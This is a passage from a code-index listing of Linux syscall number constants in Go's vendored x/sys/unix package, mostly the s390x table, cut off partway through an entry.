SYS_EXECVEAT (line 276) | SYS_EXECVEAT = 281 constant SYS_USERFAULTFD (line 277) | SYS_USERFAULTFD = 282 constant SYS_MEMBARRIER (line 278) | SYS_MEMBARRIER = 283 constant SYS_MLOCK2 (line 279) | SYS_MLOCK2 = 284 constant SYS_COPY_FILE_RANGE (line 280) | SYS_COPY_FILE_RANGE = 285 constant SYS_PREADV2 (line 281) | SYS_PREADV2 = 286 constant SYS_PWRITEV2 (line 282) | SYS_PWRITEV2 = 287 constant SYS_PKEY_MPROTECT (line 283) | SYS_PKEY_MPROTECT = 288 constant SYS_PKEY_ALLOC (line 284) | SYS_PKEY_ALLOC = 289 constant SYS_PKEY_FREE (line 285) | SYS_PKEY_FREE = 290 constant SYS_STATX (line 286) | SYS_STATX = 291 constant SYS_IO_PGETEVENTS (line 287) | SYS_IO_PGETEVENTS = 292 constant SYS_RSEQ (line 288) | SYS_RSEQ = 293 constant SYS_KEXEC_FILE_LOAD (line 289) | SYS_KEXEC_FILE_LOAD = 294 constant SYS_PIDFD_SEND_SIGNAL (line 290) | SYS_PIDFD_SEND_SIGNAL = 424 constant SYS_IO_URING_SETUP (line 291) | SYS_IO_URING_SETUP = 425 constant SYS_IO_URING_ENTER (line 292) | SYS_IO_URING_ENTER = 426 constant SYS_IO_URING_REGISTER (line 293) | SYS_IO_URING_REGISTER = 427 constant SYS_OPEN_TREE (line 294) | SYS_OPEN_TREE = 428 constant SYS_MOVE_MOUNT (line 295) | SYS_MOVE_MOUNT = 429 constant SYS_FSOPEN (line 296) | SYS_FSOPEN = 430 constant SYS_FSCONFIG (line 297) | SYS_FSCONFIG = 431 constant SYS_FSMOUNT (line 298) | SYS_FSMOUNT = 432 constant SYS_FSPICK (line 299) | SYS_FSPICK = 433 constant SYS_PIDFD_OPEN (line 300) | SYS_PIDFD_OPEN = 434 constant SYS_CLONE3 (line 301) | SYS_CLONE3 = 435 constant SYS_CLOSE_RANGE (line 302) | SYS_CLOSE_RANGE = 436 constant SYS_OPENAT2 (line 303) | SYS_OPENAT2 = 437 constant SYS_PIDFD_GETFD (line 304) | SYS_PIDFD_GETFD = 438 constant SYS_FACCESSAT2 (line 305) | SYS_FACCESSAT2 = 439 constant SYS_PROCESS_MADVISE (line 306) | SYS_PROCESS_MADVISE = 440 constant SYS_EPOLL_PWAIT2 (line 307) | SYS_EPOLL_PWAIT2 = 441 constant SYS_MOUNT_SETATTR (line 308) | SYS_MOUNT_SETATTR = 442 constant SYS_QUOTACTL_FD (line 309) | SYS_QUOTACTL_FD = 443 constant SYS_LANDLOCK_CREATE_RULESET (line 310) | SYS_LANDLOCK_CREATE_RULESET = 444 constant SYS_LANDLOCK_ADD_RULE (line 311) | SYS_LANDLOCK_ADD_RULE = 445 constant SYS_LANDLOCK_RESTRICT_SELF (line 312) | SYS_LANDLOCK_RESTRICT_SELF = 446 constant SYS_MEMFD_SECRET (line 313) | SYS_MEMFD_SECRET = 447 constant SYS_PROCESS_MRELEASE (line 314) | SYS_PROCESS_MRELEASE = 448 constant SYS_FUTEX_WAITV (line 315) | SYS_FUTEX_WAITV = 449 constant SYS_SET_MEMPOLICY_HOME_NODE (line 316) | SYS_SET_MEMPOLICY_HOME_NODE = 450 constant SYS_CACHESTAT (line 317) | SYS_CACHESTAT = 451 constant SYS_FCHMODAT2 (line 318) | SYS_FCHMODAT2 = 452 constant SYS_MAP_SHADOW_STACK (line 319) | SYS_MAP_SHADOW_STACK = 453 constant SYS_FUTEX_WAKE (line 320) | SYS_FUTEX_WAKE = 454 constant SYS_FUTEX_WAIT (line 321) | SYS_FUTEX_WAIT = 455 constant SYS_FUTEX_REQUEUE (line 322) | SYS_FUTEX_REQUEUE = 456 FILE: vendor/golang.org/x/sys/unix/zsysnum_linux_s390x.go constant SYS_EXIT (line 9) | SYS_EXIT = 1 constant SYS_FORK (line 10) | SYS_FORK = 2 constant SYS_READ (line 11) | SYS_READ = 3 constant SYS_WRITE (line 12) | SYS_WRITE = 4 constant SYS_OPEN (line 13) | SYS_OPEN = 5 constant SYS_CLOSE (line 14) | SYS_CLOSE = 6 constant SYS_RESTART_SYSCALL (line 15) | SYS_RESTART_SYSCALL = 7 constant SYS_CREAT (line 16) | SYS_CREAT = 8 constant SYS_LINK (line 17) | SYS_LINK = 9 constant SYS_UNLINK (line 18) | SYS_UNLINK = 10 constant SYS_EXECVE (line 19) | SYS_EXECVE = 11 constant SYS_CHDIR (line 20) | SYS_CHDIR = 12 constant SYS_MKNOD (line 21) | SYS_MKNOD = 14 constant SYS_CHMOD (line 22) | SYS_CHMOD = 15 constant SYS_LSEEK (line 23) | SYS_LSEEK = 19 constant SYS_GETPID (line 24) | SYS_GETPID = 20 constant SYS_MOUNT (line 25) | SYS_MOUNT = 21 constant SYS_UMOUNT (line 26) | SYS_UMOUNT = 22 constant SYS_PTRACE (line 27) | SYS_PTRACE = 26 constant SYS_ALARM (line 28) | SYS_ALARM = 27 constant SYS_PAUSE (line 29) | SYS_PAUSE = 29 constant SYS_UTIME (line 30) | SYS_UTIME = 30 constant SYS_ACCESS (line 31) | SYS_ACCESS = 33 constant SYS_NICE (line 32) | SYS_NICE = 34 constant SYS_SYNC (line 33) | SYS_SYNC = 36 constant SYS_KILL (line 34) | SYS_KILL = 37 constant SYS_RENAME (line 35) | SYS_RENAME = 38 constant SYS_MKDIR (line 36) | SYS_MKDIR = 39 constant SYS_RMDIR (line 37) | SYS_RMDIR = 40 constant SYS_DUP (line 38) | SYS_DUP = 41 constant SYS_PIPE (line 39) | SYS_PIPE = 42 constant SYS_TIMES (line 40) | SYS_TIMES = 43 constant SYS_BRK (line 41) | SYS_BRK = 45 constant SYS_SIGNAL (line 42) | SYS_SIGNAL = 48 constant SYS_ACCT (line 43) | SYS_ACCT = 51 constant SYS_UMOUNT2 (line 44) | SYS_UMOUNT2 = 52 constant SYS_IOCTL (line 45) | SYS_IOCTL = 54 constant SYS_FCNTL (line 46) | SYS_FCNTL = 55 constant SYS_SETPGID (line 47) | SYS_SETPGID = 57 constant SYS_UMASK (line 48) | SYS_UMASK = 60 constant SYS_CHROOT (line 49) | SYS_CHROOT = 61 constant SYS_USTAT (line 50) | SYS_USTAT = 62 constant SYS_DUP2 (line 51) | SYS_DUP2 = 63 constant SYS_GETPPID (line 52) | SYS_GETPPID = 64 constant SYS_GETPGRP (line 53) | SYS_GETPGRP = 65 constant SYS_SETSID (line 54) | SYS_SETSID = 66 constant SYS_SIGACTION (line 55) | SYS_SIGACTION = 67 constant SYS_SIGSUSPEND (line 56) | SYS_SIGSUSPEND = 72 constant SYS_SIGPENDING (line 57) | SYS_SIGPENDING = 73 constant SYS_SETHOSTNAME (line 58) | SYS_SETHOSTNAME = 74 constant SYS_SETRLIMIT (line 59) | SYS_SETRLIMIT = 75 constant SYS_GETRUSAGE (line 60) | SYS_GETRUSAGE = 77 constant SYS_GETTIMEOFDAY (line 61) | SYS_GETTIMEOFDAY = 78 constant SYS_SETTIMEOFDAY (line 62) | SYS_SETTIMEOFDAY = 79 constant SYS_SYMLINK (line 63) | SYS_SYMLINK = 83 constant SYS_READLINK (line 64) | SYS_READLINK = 85 constant SYS_USELIB (line 65) | SYS_USELIB = 86 constant SYS_SWAPON (line 66) | SYS_SWAPON = 87 constant SYS_REBOOT (line 67) | SYS_REBOOT = 88 constant SYS_READDIR (line 68) | SYS_READDIR = 89 constant SYS_MMAP (line 69) | SYS_MMAP = 90 constant SYS_MUNMAP (line 70) | SYS_MUNMAP = 91 constant SYS_TRUNCATE (line 71) | SYS_TRUNCATE = 92 constant SYS_FTRUNCATE (line 72) | SYS_FTRUNCATE = 93 constant SYS_FCHMOD (line 73) | SYS_FCHMOD = 94 constant SYS_GETPRIORITY (line 74) | SYS_GETPRIORITY = 96 constant SYS_SETPRIORITY (line 75) | SYS_SETPRIORITY = 97 constant SYS_STATFS (line 76) | SYS_STATFS = 99 constant SYS_FSTATFS (line 77) | SYS_FSTATFS = 100 constant SYS_SOCKETCALL (line 78) | SYS_SOCKETCALL = 102 constant SYS_SYSLOG (line 79) | SYS_SYSLOG = 103 constant SYS_SETITIMER (line 80) | SYS_SETITIMER = 104 constant SYS_GETITIMER (line 81) | SYS_GETITIMER = 105 constant SYS_STAT (line 82) | SYS_STAT = 106 constant SYS_LSTAT (line 83) | SYS_LSTAT = 107 constant SYS_FSTAT (line 84) | SYS_FSTAT = 108 constant SYS_LOOKUP_DCOOKIE (line 85) | SYS_LOOKUP_DCOOKIE = 110 constant SYS_VHANGUP (line 86) | SYS_VHANGUP = 111 constant SYS_IDLE (line 87) | SYS_IDLE = 112 constant SYS_WAIT4 (line 88) | SYS_WAIT4 = 114 constant SYS_SWAPOFF (line 89) | SYS_SWAPOFF = 115 constant SYS_SYSINFO (line 90) | SYS_SYSINFO = 116 constant SYS_IPC (line 91) | SYS_IPC = 117 constant SYS_FSYNC (line 92) | SYS_FSYNC = 118 constant SYS_SIGRETURN (line 93) | SYS_SIGRETURN = 119 constant SYS_CLONE (line 94) | SYS_CLONE = 120 constant SYS_SETDOMAINNAME (line 95) | SYS_SETDOMAINNAME = 121 constant SYS_UNAME (line 96) | SYS_UNAME = 122 constant SYS_ADJTIMEX (line 97) | SYS_ADJTIMEX = 124 constant SYS_MPROTECT (line 98) | SYS_MPROTECT = 125 constant SYS_SIGPROCMASK (line 99) | SYS_SIGPROCMASK = 126 constant SYS_CREATE_MODULE (line 100) | SYS_CREATE_MODULE = 127 constant SYS_INIT_MODULE (line 101) | SYS_INIT_MODULE = 128 constant SYS_DELETE_MODULE (line 102) | SYS_DELETE_MODULE = 129 constant SYS_GET_KERNEL_SYMS (line 103) | SYS_GET_KERNEL_SYMS = 130 constant SYS_QUOTACTL (line 104) | SYS_QUOTACTL = 131 constant SYS_GETPGID (line 105) | SYS_GETPGID = 132 constant SYS_FCHDIR (line 106) | SYS_FCHDIR = 133 constant SYS_BDFLUSH (line 107) | SYS_BDFLUSH = 134 constant SYS_SYSFS (line 108) | SYS_SYSFS = 135 constant SYS_PERSONALITY (line 109) | SYS_PERSONALITY = 136 constant SYS_AFS_SYSCALL (line 110) | SYS_AFS_SYSCALL = 137 constant SYS_GETDENTS (line 111) | SYS_GETDENTS = 141 constant SYS_SELECT (line 112) | SYS_SELECT = 142 constant SYS_FLOCK (line 113) | SYS_FLOCK = 143 constant SYS_MSYNC (line 114) | SYS_MSYNC = 144 constant SYS_READV (line 115) | SYS_READV = 145 constant SYS_WRITEV (line 116) | SYS_WRITEV = 146 constant SYS_GETSID (line 117) | SYS_GETSID = 147 constant SYS_FDATASYNC (line 118) | SYS_FDATASYNC = 148 constant SYS__SYSCTL (line 119) | SYS__SYSCTL = 149 constant SYS_MLOCK (line 120) | SYS_MLOCK = 150 constant SYS_MUNLOCK (line 121) | SYS_MUNLOCK = 151 constant SYS_MLOCKALL (line 122) | SYS_MLOCKALL = 152 constant SYS_MUNLOCKALL (line 123) | SYS_MUNLOCKALL = 153 constant SYS_SCHED_SETPARAM (line 124) | SYS_SCHED_SETPARAM = 154 constant SYS_SCHED_GETPARAM (line 125) | SYS_SCHED_GETPARAM = 155 constant SYS_SCHED_SETSCHEDULER (line 126) | SYS_SCHED_SETSCHEDULER = 156 constant SYS_SCHED_GETSCHEDULER (line 127) | SYS_SCHED_GETSCHEDULER = 157 constant SYS_SCHED_YIELD (line 128) | SYS_SCHED_YIELD = 158 constant SYS_SCHED_GET_PRIORITY_MAX (line 129) | SYS_SCHED_GET_PRIORITY_MAX = 159 constant SYS_SCHED_GET_PRIORITY_MIN (line 130) | SYS_SCHED_GET_PRIORITY_MIN = 160 constant SYS_SCHED_RR_GET_INTERVAL (line 131) | SYS_SCHED_RR_GET_INTERVAL = 161 constant SYS_NANOSLEEP (line 132) | SYS_NANOSLEEP = 162 constant SYS_MREMAP (line 133) | SYS_MREMAP = 163 constant SYS_QUERY_MODULE (line 134) | SYS_QUERY_MODULE = 167 constant SYS_POLL (line 135) | SYS_POLL = 168 constant SYS_NFSSERVCTL (line 136) | SYS_NFSSERVCTL = 169 constant SYS_PRCTL (line 137) | SYS_PRCTL = 172 constant SYS_RT_SIGRETURN (line 138) | SYS_RT_SIGRETURN = 173 constant SYS_RT_SIGACTION (line 139) | SYS_RT_SIGACTION = 174 constant SYS_RT_SIGPROCMASK (line 140) | SYS_RT_SIGPROCMASK = 175 constant SYS_RT_SIGPENDING (line 141) | SYS_RT_SIGPENDING = 176 constant SYS_RT_SIGTIMEDWAIT (line 142) | SYS_RT_SIGTIMEDWAIT = 177 constant SYS_RT_SIGQUEUEINFO (line 143) | SYS_RT_SIGQUEUEINFO = 178 constant SYS_RT_SIGSUSPEND (line 144) | SYS_RT_SIGSUSPEND = 179 constant SYS_PREAD64 (line 145) | SYS_PREAD64 = 180 constant SYS_PWRITE64 (line 146) | SYS_PWRITE64 = 181 constant SYS_GETCWD (line 147) | SYS_GETCWD = 183 constant SYS_CAPGET (line 148) | SYS_CAPGET = 184 constant SYS_CAPSET (line 149) | SYS_CAPSET = 185 constant SYS_SIGALTSTACK (line 150) | SYS_SIGALTSTACK = 186 constant SYS_SENDFILE (line 151) | SYS_SENDFILE = 187 constant SYS_GETPMSG (line 152) | SYS_GETPMSG = 188 constant SYS_PUTPMSG (line 153) | SYS_PUTPMSG = 189 constant SYS_VFORK (line 154) | SYS_VFORK = 190 constant SYS_GETRLIMIT (line 155) | SYS_GETRLIMIT = 191 constant SYS_LCHOWN (line 156) | SYS_LCHOWN = 198 constant SYS_GETUID (line 157) | SYS_GETUID = 199 constant SYS_GETGID (line 158) | SYS_GETGID = 200 constant SYS_GETEUID (line 159) | SYS_GETEUID = 201 constant SYS_GETEGID (line 160) | SYS_GETEGID = 202 constant SYS_SETREUID (line 161) | SYS_SETREUID = 203 constant SYS_SETREGID (line 162) | SYS_SETREGID = 204 constant SYS_GETGROUPS (line 163) | SYS_GETGROUPS = 205 constant SYS_SETGROUPS (line 164) | SYS_SETGROUPS = 206 constant SYS_FCHOWN (line 165) | SYS_FCHOWN = 207 constant SYS_SETRESUID (line 166) | SYS_SETRESUID = 208 constant SYS_GETRESUID (line 167) | SYS_GETRESUID = 209 constant SYS_SETRESGID (line 168) | SYS_SETRESGID = 210 constant SYS_GETRESGID (line 169) | SYS_GETRESGID = 211 constant SYS_CHOWN (line 170) | SYS_CHOWN = 212 constant SYS_SETUID (line 171) | SYS_SETUID = 213 constant SYS_SETGID (line 172) | SYS_SETGID = 214 constant SYS_SETFSUID (line 173) | SYS_SETFSUID = 215 constant SYS_SETFSGID (line 174) | SYS_SETFSGID = 216 constant SYS_PIVOT_ROOT (line 175) | SYS_PIVOT_ROOT = 217 constant SYS_MINCORE (line 176) | SYS_MINCORE = 218 constant SYS_MADVISE (line 177) | SYS_MADVISE = 219 constant SYS_GETDENTS64 (line 178) | SYS_GETDENTS64 = 220 constant SYS_READAHEAD (line 179) | SYS_READAHEAD = 222 constant SYS_SETXATTR (line 180) | SYS_SETXATTR = 224 constant SYS_LSETXATTR (line 181) | SYS_LSETXATTR = 225 constant SYS_FSETXATTR (line 182) | SYS_FSETXATTR = 226 constant SYS_GETXATTR (line 183) | SYS_GETXATTR = 227 constant SYS_LGETXATTR (line 184) | SYS_LGETXATTR = 228 constant SYS_FGETXATTR (line 185) | SYS_FGETXATTR = 229 constant SYS_LISTXATTR (line 186) | SYS_LISTXATTR = 230 constant SYS_LLISTXATTR (line 187) | SYS_LLISTXATTR = 231 constant SYS_FLISTXATTR (line 188) | SYS_FLISTXATTR = 232 constant SYS_REMOVEXATTR (line 189) | SYS_REMOVEXATTR = 233 constant SYS_LREMOVEXATTR (line 190) | SYS_LREMOVEXATTR = 234 constant SYS_FREMOVEXATTR (line 191) | SYS_FREMOVEXATTR = 235 constant SYS_GETTID (line 192) | SYS_GETTID = 236 constant SYS_TKILL (line 193) | SYS_TKILL = 237 constant SYS_FUTEX (line 194) | SYS_FUTEX = 238 constant SYS_SCHED_SETAFFINITY (line 195) | SYS_SCHED_SETAFFINITY = 239 constant SYS_SCHED_GETAFFINITY (line 196) | SYS_SCHED_GETAFFINITY = 240 constant SYS_TGKILL (line 197) | SYS_TGKILL = 241 constant SYS_IO_SETUP (line 198) | SYS_IO_SETUP = 243 constant SYS_IO_DESTROY (line 199) | SYS_IO_DESTROY = 244 constant SYS_IO_GETEVENTS (line 200) | SYS_IO_GETEVENTS = 245 constant SYS_IO_SUBMIT (line 201) | SYS_IO_SUBMIT = 246 constant SYS_IO_CANCEL (line 202) | SYS_IO_CANCEL = 247 constant SYS_EXIT_GROUP (line 203) | SYS_EXIT_GROUP = 248 constant SYS_EPOLL_CREATE (line 204) | SYS_EPOLL_CREATE = 249 constant SYS_EPOLL_CTL (line 205) | SYS_EPOLL_CTL = 250 constant SYS_EPOLL_WAIT (line 206) | SYS_EPOLL_WAIT = 251 constant SYS_SET_TID_ADDRESS (line 207) | SYS_SET_TID_ADDRESS = 252 constant SYS_FADVISE64 (line 208) | SYS_FADVISE64 = 253 constant SYS_TIMER_CREATE (line 209) | SYS_TIMER_CREATE = 254 constant SYS_TIMER_SETTIME (line 210) | SYS_TIMER_SETTIME = 255 constant SYS_TIMER_GETTIME (line 211) | SYS_TIMER_GETTIME = 256 constant SYS_TIMER_GETOVERRUN (line 212) | SYS_TIMER_GETOVERRUN = 257 constant SYS_TIMER_DELETE (line 213) | SYS_TIMER_DELETE = 258 constant SYS_CLOCK_SETTIME (line 214) | SYS_CLOCK_SETTIME = 259 constant SYS_CLOCK_GETTIME (line 215) | SYS_CLOCK_GETTIME = 260 constant SYS_CLOCK_GETRES (line 216) | SYS_CLOCK_GETRES = 261 constant SYS_CLOCK_NANOSLEEP (line 217) | SYS_CLOCK_NANOSLEEP = 262 constant SYS_STATFS64 (line 218) | SYS_STATFS64 = 265 constant SYS_FSTATFS64 (line 219) | SYS_FSTATFS64 = 266 constant SYS_REMAP_FILE_PAGES (line 220) | SYS_REMAP_FILE_PAGES = 267 constant SYS_MBIND (line 221) | SYS_MBIND = 268 constant SYS_GET_MEMPOLICY (line 222) | SYS_GET_MEMPOLICY = 269 constant SYS_SET_MEMPOLICY (line 223) | SYS_SET_MEMPOLICY = 270 constant SYS_MQ_OPEN (line 224) | SYS_MQ_OPEN = 271 constant SYS_MQ_UNLINK (line 225) | SYS_MQ_UNLINK = 272 constant SYS_MQ_TIMEDSEND (line 226) | SYS_MQ_TIMEDSEND = 273 constant SYS_MQ_TIMEDRECEIVE (line 227) | SYS_MQ_TIMEDRECEIVE = 274 constant SYS_MQ_NOTIFY (line 228) | SYS_MQ_NOTIFY = 275 constant SYS_MQ_GETSETATTR (line 229) | SYS_MQ_GETSETATTR = 276 constant SYS_KEXEC_LOAD (line 230) | SYS_KEXEC_LOAD = 277 constant SYS_ADD_KEY (line 231) | SYS_ADD_KEY = 278 constant SYS_REQUEST_KEY (line 232) | SYS_REQUEST_KEY = 279 constant SYS_KEYCTL (line 233) | SYS_KEYCTL = 280 constant SYS_WAITID (line 234) | SYS_WAITID = 281 constant SYS_IOPRIO_SET (line 235) | SYS_IOPRIO_SET = 282 constant SYS_IOPRIO_GET (line 236) | SYS_IOPRIO_GET = 283 constant SYS_INOTIFY_INIT (line 237) | SYS_INOTIFY_INIT = 284 constant SYS_INOTIFY_ADD_WATCH (line 238) | SYS_INOTIFY_ADD_WATCH = 285 constant SYS_INOTIFY_RM_WATCH (line 239) | SYS_INOTIFY_RM_WATCH = 286 constant SYS_MIGRATE_PAGES (line 240) | SYS_MIGRATE_PAGES = 287 constant SYS_OPENAT (line 241) | SYS_OPENAT = 288 constant SYS_MKDIRAT (line 242) | SYS_MKDIRAT = 289 constant SYS_MKNODAT (line 243) | SYS_MKNODAT = 290 constant SYS_FCHOWNAT (line 244) | SYS_FCHOWNAT = 291 constant SYS_FUTIMESAT (line 245) | SYS_FUTIMESAT = 292 constant SYS_NEWFSTATAT (line 246) | SYS_NEWFSTATAT = 293 constant SYS_UNLINKAT (line 247) | SYS_UNLINKAT = 294 constant SYS_RENAMEAT (line 248) | SYS_RENAMEAT = 295 constant SYS_LINKAT (line 249) | SYS_LINKAT = 296 constant SYS_SYMLINKAT (line 250) | SYS_SYMLINKAT = 297 constant SYS_READLINKAT (line 251) | SYS_READLINKAT = 298 constant SYS_FCHMODAT (line 252) | SYS_FCHMODAT = 299 constant SYS_FACCESSAT (line 253) | SYS_FACCESSAT = 300 constant SYS_PSELECT6 (line 254) | SYS_PSELECT6 = 301 constant SYS_PPOLL (line 255) | SYS_PPOLL = 302 constant SYS_UNSHARE (line 256) | SYS_UNSHARE = 303 constant SYS_SET_ROBUST_LIST (line 257) | SYS_SET_ROBUST_LIST = 304 constant SYS_GET_ROBUST_LIST (line 258) | SYS_GET_ROBUST_LIST = 305 constant SYS_SPLICE (line 259) | SYS_SPLICE = 306 constant SYS_SYNC_FILE_RANGE (line 260) | SYS_SYNC_FILE_RANGE = 307 constant SYS_TEE (line 261) | SYS_TEE = 308 constant SYS_VMSPLICE (line 262) | SYS_VMSPLICE = 309 constant SYS_MOVE_PAGES (line 263) | SYS_MOVE_PAGES = 310 constant SYS_GETCPU (line 264) | SYS_GETCPU = 311 constant SYS_EPOLL_PWAIT (line 265) | SYS_EPOLL_PWAIT = 312 constant SYS_UTIMES (line 266) | SYS_UTIMES = 313 constant SYS_FALLOCATE (line 267) | SYS_FALLOCATE = 314 constant SYS_UTIMENSAT (line 268) | SYS_UTIMENSAT = 315 constant SYS_SIGNALFD (line 269) | SYS_SIGNALFD = 316 constant SYS_TIMERFD (line 270) | SYS_TIMERFD = 317 constant SYS_EVENTFD (line 271) | SYS_EVENTFD = 318 constant SYS_TIMERFD_CREATE (line 272) | SYS_TIMERFD_CREATE = 319 constant SYS_TIMERFD_SETTIME (line 273) | SYS_TIMERFD_SETTIME = 320 constant SYS_TIMERFD_GETTIME (line 274) | SYS_TIMERFD_GETTIME = 321 constant SYS_SIGNALFD4 (line 275) | SYS_SIGNALFD4 = 322 constant SYS_EVENTFD2 (line 276) | SYS_EVENTFD2 = 323 constant SYS_INOTIFY_INIT1 (line 277) | SYS_INOTIFY_INIT1 = 324 constant SYS_PIPE2 (line 278) | SYS_PIPE2 = 325 constant SYS_DUP3 (line 279) | SYS_DUP3 = 326 constant SYS_EPOLL_CREATE1 (line 280) | SYS_EPOLL_CREATE1 = 327 constant SYS_PREADV (line 281) | SYS_PREADV = 328 constant SYS_PWRITEV (line 282) | SYS_PWRITEV = 329 constant SYS_RT_TGSIGQUEUEINFO (line 283) | SYS_RT_TGSIGQUEUEINFO = 330 constant SYS_PERF_EVENT_OPEN (line 284) | SYS_PERF_EVENT_OPEN = 331 constant SYS_FANOTIFY_INIT (line 285) | SYS_FANOTIFY_INIT = 332 constant SYS_FANOTIFY_MARK (line 286) | SYS_FANOTIFY_MARK = 333 constant SYS_PRLIMIT64 (line 287) | SYS_PRLIMIT64 = 334 constant SYS_NAME_TO_HANDLE_AT (line 288) | SYS_NAME_TO_HANDLE_AT = 335 constant SYS_OPEN_BY_HANDLE_AT (line 289) | SYS_OPEN_BY_HANDLE_AT = 336 constant SYS_CLOCK_ADJTIME (line 290) | SYS_CLOCK_ADJTIME = 337 constant SYS_SYNCFS (line 291) | SYS_SYNCFS = 338 constant SYS_SETNS (line 292) | SYS_SETNS = 339 constant SYS_PROCESS_VM_READV (line 293) | SYS_PROCESS_VM_READV = 340 constant SYS_PROCESS_VM_WRITEV (line 294) | SYS_PROCESS_VM_WRITEV = 341 constant SYS_S390_RUNTIME_INSTR (line 295) | SYS_S390_RUNTIME_INSTR = 342 constant SYS_KCMP (line 296) | SYS_KCMP = 343 constant SYS_FINIT_MODULE (line 297) | SYS_FINIT_MODULE = 344 constant SYS_SCHED_SETATTR (line 298) | SYS_SCHED_SETATTR = 345 constant SYS_SCHED_GETATTR (line 299) | SYS_SCHED_GETATTR = 346 constant SYS_RENAMEAT2 (line 300) | SYS_RENAMEAT2 = 347 constant SYS_SECCOMP (line 301) | SYS_SECCOMP = 348 constant SYS_GETRANDOM (line 302) | SYS_GETRANDOM = 349 constant SYS_MEMFD_CREATE (line 303) | SYS_MEMFD_CREATE = 350 constant SYS_BPF (line 304) | SYS_BPF = 351 constant SYS_S390_PCI_MMIO_WRITE (line 305) | SYS_S390_PCI_MMIO_WRITE = 352 constant SYS_S390_PCI_MMIO_READ (line 306) | SYS_S390_PCI_MMIO_READ = 353 constant SYS_EXECVEAT (line 307) | SYS_EXECVEAT = 354 constant SYS_USERFAULTFD (line 308) | SYS_USERFAULTFD = 355 constant SYS_MEMBARRIER (line 309) | SYS_MEMBARRIER = 356 constant SYS_RECVMMSG (line 310) | SYS_RECVMMSG = 357 constant SYS_SENDMMSG (line 311) | SYS_SENDMMSG = 358 constant SYS_SOCKET (line 312) | SYS_SOCKET = 359 constant SYS_SOCKETPAIR (line 313) | SYS_SOCKETPAIR = 360 constant SYS_BIND (line 314) | SYS_BIND = 361 constant SYS_CONNECT (line 315) | SYS_CONNECT = 362 constant SYS_LISTEN (line 316) | SYS_LISTEN = 363 constant SYS_ACCEPT4 (line 317) | SYS_ACCEPT4 = 364 constant SYS_GETSOCKOPT (line 318) | SYS_GETSOCKOPT = 365 constant SYS_SETSOCKOPT (line 319) | SYS_SETSOCKOPT = 366 constant SYS_GETSOCKNAME (line 320) | SYS_GETSOCKNAME = 367 constant SYS_GETPEERNAME (line 321) | SYS_GETPEERNAME = 368 constant SYS_SENDTO (line 322) | SYS_SENDTO = 369 constant SYS_SENDMSG (line 323) | SYS_SENDMSG = 370 constant SYS_RECVFROM (line 324) | SYS_RECVFROM = 371 constant SYS_RECVMSG (line 325) | SYS_RECVMSG = 372 constant SYS_SHUTDOWN (line 326) | SYS_SHUTDOWN = 373 constant SYS_MLOCK2 (line 327) | SYS_MLOCK2 = 374 constant SYS_COPY_FILE_RANGE (line 328) | SYS_COPY_FILE_RANGE = 375 constant SYS_PREADV2 (line 329) | SYS_PREADV2 = 376 constant SYS_PWRITEV2 (line 330) | SYS_PWRITEV2 = 377 constant SYS_S390_GUARDED_STORAGE (line 331) | SYS_S390_GUARDED_STORAGE = 378 constant SYS_STATX (line 332) | SYS_STATX = 379 constant SYS_S390_STHYI (line 333) | SYS_S390_STHYI = 380 constant SYS_KEXEC_FILE_LOAD (line 334) | SYS_KEXEC_FILE_LOAD = 381 constant SYS_IO_PGETEVENTS (line 335) | SYS_IO_PGETEVENTS = 382 constant SYS_RSEQ (line 336) | SYS_RSEQ = 383 constant SYS_PKEY_MPROTECT (line 337) | SYS_PKEY_MPROTECT = 384 constant SYS_PKEY_ALLOC (line 338) | SYS_PKEY_ALLOC = 385 constant SYS_PKEY_FREE (line 339) | SYS_PKEY_FREE = 386 constant SYS_SEMTIMEDOP (line 340) | SYS_SEMTIMEDOP = 392 constant SYS_SEMGET (line 341) | SYS_SEMGET = 393 constant SYS_SEMCTL (line 342) | SYS_SEMCTL = 394 constant SYS_SHMGET (line 343) | SYS_SHMGET = 395 constant SYS_SHMCTL (line 344) | SYS_SHMCTL = 396 constant SYS_SHMAT (line 345) | SYS_SHMAT = 397 constant SYS_SHMDT (line 346) | SYS_SHMDT = 398 constant SYS_MSGGET (line 347) | SYS_MSGGET = 399 constant SYS_MSGSND (line 348) | SYS_MSGSND = 400 constant SYS_MSGRCV (line 349) | SYS_MSGRCV = 401 constant SYS_MSGCTL (line 350) | SYS_MSGCTL = 402 constant SYS_PIDFD_SEND_SIGNAL (line 351) | SYS_PIDFD_SEND_SIGNAL = 424 constant SYS_IO_URING_SETUP (line 352) | SYS_IO_URING_SETUP = 425 constant SYS_IO_URING_ENTER (line 353) | SYS_IO_URING_ENTER = 426 constant SYS_IO_URING_REGISTER (line 354) | SYS_IO_URING_REGISTER = 427 constant SYS_OPEN_TREE (line 355) | SYS_OPEN_TREE = 428 constant SYS_MOVE_MOUNT (line 356) | SYS_MOVE_MOUNT = 429 constant SYS_FSOPEN (line 357) | SYS_FSOPEN = 430 constant SYS_FSCONFIG (line 358) | SYS_FSCONFIG = 431 constant SYS_FSMOUNT (line 359) | SYS_FSMOUNT = 432 constant SYS_FSPICK (line 360) | SYS_FSPICK = 433 constant SYS_PIDFD_OPEN (line 361) | SYS_PIDFD_OPEN = 434 constant SYS_CLONE3 (line 362) | SYS_CLONE3 = 435 constant SYS_CLOSE_RANGE (line 363) | SYS_CLOSE_RANGE = 436 constant SYS_OPENAT2 (line 364) | SYS_OPENAT2 = 437 constant SYS_PIDFD_GETFD (line 365) | SYS_PIDFD_GETFD = 438 constant SYS_FACCESSAT2 (line 366) | SYS_FACCESSAT2 = 439 constant SYS_PROCESS_MADVISE (line 367) | SYS_PROCESS_MADVISE = 440 constant SYS_EPOLL_PWAIT2 (line 368) | SYS_EPOLL_PWAIT2 = 441 constant SYS_MOUNT_SETATTR (line 369) | SYS_MOUNT_SETATTR = 442 constant SYS_QUOTACTL_FD (line 370) | SYS_QUOTACTL_FD = 443 constant SYS_LANDLOCK_CREATE_RULESET (line 371) | SYS_LANDLOCK_CREATE_RULESET = 444 constant SYS_LANDLOCK_ADD_RULE (line 372) | SYS_LANDLOCK_ADD_RULE = 445 constant SYS_LANDLOCK_RESTRICT_SELF (line 373) | SYS_LANDLOCK_RESTRICT_SELF = 446 constant SYS_MEMFD_SECRET (line 374) | SYS_MEMFD_SECRET = 447 constant SYS_PROCESS_MRELEASE (line 375) | SYS_PROCESS_MRELEASE = 448 constant SYS_FUTEX_WAITV (line 376) | SYS_FUTEX_WAITV = 449 constant SYS_SET_MEMPOLICY_HOME_NODE (line 377) | SYS_SET_MEMPOLICY_HOME_NODE = 450 constant SYS_CACHESTAT (line 378) | SYS_CACHESTAT = 451 constant SYS_FCHMODAT2 